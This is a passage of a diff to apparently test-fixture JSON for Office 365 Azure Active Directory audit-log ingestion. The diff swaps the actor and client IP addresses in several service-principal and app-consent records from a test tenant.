"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -12984,9 +12984,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:17:45", "ExtendedProperties": [ { 
@@ -13220,7 +13220,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"ad
ditionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3393756Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118027\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"0031778a-80cf-49f8-aea2-f798c9bf1ec9\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: 
User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",
\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3393756Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118027\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"0031778a-80cf-49f8-aea2-f798c9bf1ec9\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; 
\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -13250,9 +13250,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:30:06", "ExtendedProperties": [ { 
@@ -13487,7 +13487,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"ad
ditionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3393756Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118027\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"0031778a-80cf-49f8-aea2-f798c9bf1ec9\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: 
User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",
\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3393756Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118027\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"0031778a-80cf-49f8-aea2-f798c9bf1ec9\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; 
\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -13517,9 +13517,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:30:06", "ExtendedProperties": [ { 
